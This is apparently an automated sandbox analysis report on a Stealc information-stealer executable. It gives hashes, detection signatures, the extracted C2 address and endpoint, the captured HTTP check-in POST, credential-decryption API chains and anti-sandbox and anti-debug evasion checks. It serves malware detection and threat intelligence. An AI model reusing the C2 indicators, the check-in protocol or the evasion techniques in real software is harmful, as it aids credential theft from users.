
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1522245
MD5: c4989e7909961b15e2428e4bdc416bf1
SHA1: 6a36b4ad1ca0fce053b450cf21fe848a168870e6
SHA256: 36453fb6acaf0514d0af6fbf8ed6b8da0372c90b713c18ef73d63b97f2ec5f53
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C4989E7909961B15E2428E4BDC416BF1)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (empty)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2075603665.0000000005050000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6984 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6984 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.690000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-09-29T15:17:05.403571+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.690000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0069C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00697240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00697240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00699AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00699AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00699B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00699B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_006A8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006A38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006A4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0069DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0069E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_006A4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0069ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0069BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0069DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006916D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_006A3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0069F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0069F68A FindFirstFileA,0_2_0069F68A

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------IJDHDGDAAAAKFIDGHJDG
    Content-Disposition: form-data; name="hwid"

    927A07862F713604296297
    ------IJDHDGDAAAAKFIDGHJDG
    Content-Disposition: form-data; name="build"

    save
    ------IJDHDGDAAAAKFIDGHJDG--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00694880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00694880
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------IJDHDGDAAAAKFIDGHJDG
    Content-Disposition: form-data; name="hwid"

    927A07862F713604296297
    ------IJDHDGDAAAAKFIDGHJDG
    Content-Disposition: form-data; name="build"

    save
    ------IJDHDGDAAAAKFIDGHJDG--
Source: file.exe, 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2117942451.00000000012A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2117942451.00000000012A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/;
Source: file.exe, 00000000.00000002.2117942451.00000000012A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2117942451.00000000012C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8
Source: file.exe, 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37I

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 | 0_2_00A5E8C7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A54879 | 0_2_00A54879
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AD86F | 0_2_009AD86F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A59A60 | 0_2_00A59A60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E6A56 | 0_2_009E6A56
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A62326 | 0_2_00A62326
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091B319 | 0_2_0091B319
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A65310 | 0_2_00A65310
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A63C98 | 0_2_00A63C98
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B05DC6 | 0_2_00B05DC6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5BD04 | 0_2_00A5BD04
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A0E507 | 0_2_00A0E507
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095D66F | 0_2_0095D66F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5CF42 | 0_2_00A5CF42
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 006945C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: gnrpyfds ZLIB complexity 0.9948069223600122
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_006A9600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_006A3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\K1QH1J2S.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1839104 > 1048576
Source: file.exe | Static PE information: Raw size of gnrpyfds is bigger than: 0x100000 < 0x19ac00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.690000.0.unpack :EW;.rsrc :W;.idata :W; :EW;gnrpyfds:EW;orxvkivb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;gnrpyfds:EW;orxvkivb:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006A9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1ca7eb should be: 0x1c5200
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: gnrpyfds
Source: file.exe | Static PE information: section name: orxvkivb
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A8A0B8 push 1B404B91h; mov dword ptr [esp], eax | 0_2_00A8A313
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1E892 push edi; mov dword ptr [esp], 214A15E9h | 0_2_00B1E896
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1E892 push 6C22C5C1h; mov dword ptr [esp], ecx | 0_2_00B1E8E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1E892 push 62733600h; mov dword ptr [esp], eax | 0_2_00B1E8F6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1E892 push 6E9FD5F6h; mov dword ptr [esp], edx | 0_2_00B1E94C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009470A0 push 05B842BAh; mov dword ptr [esp], edi | 0_2_00947151
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009470A0 push edx; mov dword ptr [esp], ebp | 0_2_00947155
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009470A0 push ebx; mov dword ptr [esp], 63BF1812h | 0_2_00947159
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF809B push ebp; mov dword ptr [esp], eax | 0_2_00AF80B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B008F8 push eax; mov dword ptr [esp], ecx | 0_2_00B0091E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B008F8 push ecx; mov dword ptr [esp], ebp | 0_2_00B009DD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006AB035 push ecx; ret | 0_2_006AB048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push 6D896095h; mov dword ptr [esp], eax | 0_2_00A5E93A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push ecx; mov dword ptr [esp], 5FBE747Fh | 0_2_00A5E992
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push ecx; mov dword ptr [esp], edx | 0_2_00A5E9D1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push 2DDC522Fh; mov dword ptr [esp], ebp | 0_2_00A5E9EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push 1F4B9047h; mov dword ptr [esp], ebp | 0_2_00A5E9F4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push ebx; mov dword ptr [esp], 777F3B0Bh | 0_2_00A5E9FB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push 0F366B30h; mov dword ptr [esp], edx | 0_2_00A5EA59
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push 36C3BC80h; mov dword ptr [esp], edi | 0_2_00A5EA8D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push ebx; mov dword ptr [esp], 5D3A4AE8h | 0_2_00A5EADA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push 6E92D4F6h; mov dword ptr [esp], ecx | 0_2_00A5EAEA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push 3193DACDh; mov dword ptr [esp], esi | 0_2_00A5EB85
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push 29F7C774h; mov dword ptr [esp], ecx | 0_2_00A5EB95
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push 53DF5748h; mov dword ptr [esp], esi | 0_2_00A5EB9F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push edi; mov dword ptr [esp], 00000088h | 0_2_00A5ECC6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push 01740C13h; mov dword ptr [esp], eax | 0_2_00A5ECDB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push esi; mov dword ptr [esp], 3A6ADE50h | 0_2_00A5ECE2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push 16FF356Dh; mov dword ptr [esp], esp | 0_2_00A5ED6A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push edi; mov dword ptr [esp], edx | 0_2_00A5ED8F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5E8C7 push 007B46D2h; mov dword ptr [esp], ebp | 0_2_00A5ED97
Source: file.exe | Static PE information: section name: gnrpyfds entropy: 7.953723729400017

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13602
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6685D second address: A66861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A66861 second address: A6686B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6686B second address: A6686F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6686F second address: A66873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6D5D7 second address: A6D5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30F40A5Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6D5EC second address: A6D5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6D5F0 second address: A6D620 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A63h 0x00000007 jmp 00007FDF30F40A69h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6D7B3 second address: A6D7B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6DCCD second address: A6DCF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jl 00007FDF30F40A56h 0x0000000c jmp 00007FDF30F40A63h 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6DCF1 second address: A6DCF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A70CB5 second address: A70CE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jbe 00007FDF30F40A56h 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FDF30F40A66h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A70CE0 second address: A70CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A70CE5 second address: A70CEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A70CEB second address: A70CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A70CEF second address: A70D16 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FDF30F40A5Ah 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDF30F40A5Dh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A70D16 second address: A70D3A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FDF30D0E300h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 jne 00007FDF30D0E2F6h 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A70D3A second address: A70D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A70D40 second address: A70D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A70D44 second address: A70D48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A70D48 second address: A70D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000003h 0x0000000b sub edi, dword ptr [ebp+122D2C26h] 0x00000011 push 00000000h 0x00000013 mov ecx, dword ptr [ebp+122D2BDEh] 0x00000019 sub ecx, dword ptr [ebp+122D3275h] 0x0000001f push 00000003h 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007FDF30D0E2F8h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b sub dword ptr [ebp+122D1C00h], ebx 0x00000041 call 00007FDF30D0E2F9h 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A70D9C second address: A70DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A70DA0 second address: A70DC8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDF30D0E2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDF30D0E307h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
